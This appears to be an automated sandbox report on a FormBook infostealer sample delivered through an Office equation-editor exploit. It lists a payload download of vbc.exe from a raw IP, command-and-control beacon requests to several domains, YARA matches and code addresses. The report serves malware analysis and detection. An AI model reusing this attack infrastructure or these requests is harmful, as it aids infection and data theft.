          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: unknownTCP traffic detected without corresponding DNS query: 103.133.106.199
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 09:14:52 GMTContent-Type: text/htmlContent-Length: 320Connection: closeETag: "595213ce-140"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 22 3e 0a 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 2f 70 61 72 6b 69 6e 67 22 3e 0a 3c 6e 6f 66 72 61 6d 65 73 3e 0a 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 0a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 2f 70 61 72 6b 69 6e 67 22 3e 6c 69 6e 6b 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><frameset rows="100%"><frame src="https://wanwang.aliyun.com/domain/parking"><noframes><body><script> <a href="https://wanwang.aliyun.com/domain/parking">link</a></body></noframes></frameset>
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.491485736.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: EBBD63B0.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
          Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: svchost.exe, 00000009.00000002.682029665.0000000001062000.00000004.00020000.sdmpString found in binary or memory: https://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXD
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBBD63B0.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.359326.com
          Source: global trafficHTTP traffic detected: GET /rbi/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.106.199Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz HTTP/1.1Host: www.thvsjwjvy.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz HTTP/1.1Host: www.biotechfla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz HTTP/1.1Host: www.absolutalibertas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: vbc[1].exe.4.dr, Form1.csLong String: Length: 38272
          Source: vbc.exe.4.dr, Form1.csLong String: Length: 38272
          Source: 6.2.vbc.exe.f70000.2.unpack, Form1.csLong String: Length: 38272
          Source: 6.0.vbc.exe.f70000.0.unpack, Form1.csLong String: Length: 38272
          Source: 7.0.vbc.exe.f70000.0.unpack, Form1.csLong String: Length: 38272
          Source: 7.2.vbc.exe.f70000.5.unpack, Form1.csLong String: Length: 38272
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00457888
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004590A8
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00450168
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00455178
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00457120
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00458291
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00454BA9
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00456550
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00455578
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B040
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B030
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004578C8
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045D8E8
          Source: C:\Users\Public\vbc.exeCode function: 6_2_004590A0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00455168
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045F980
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B250
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B260
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045F388
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B4C8
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B4D8
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00450519
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045DDD1
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00454E28
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B6C0
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00911C26
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00911A38
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00911740
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B982
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C184
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CBAB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B4A3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041BD18
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D8A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00933040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009563DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00932305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00937353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00965485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00941489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00976540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00934680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009657C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009CF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009329B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009469FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009E3A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009DCBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009BDBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00957B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009CFDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00960D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093CD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00962E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094EE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00940F3F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009FE0C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A2D005
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A03040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A1905A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009FE2E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00AA1238
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00AA63BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009FF3CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A263DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A02305
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A4A37B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A07353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A35485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A11489
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A3D47D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A1C5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A0351F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A46540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A04680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A0E6C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00AA2622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A4A634
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A0C7BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A8579A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A357C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A9F8EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A2286D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A0C85C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A029B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00AA098E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A169FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A85955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00AB3A83
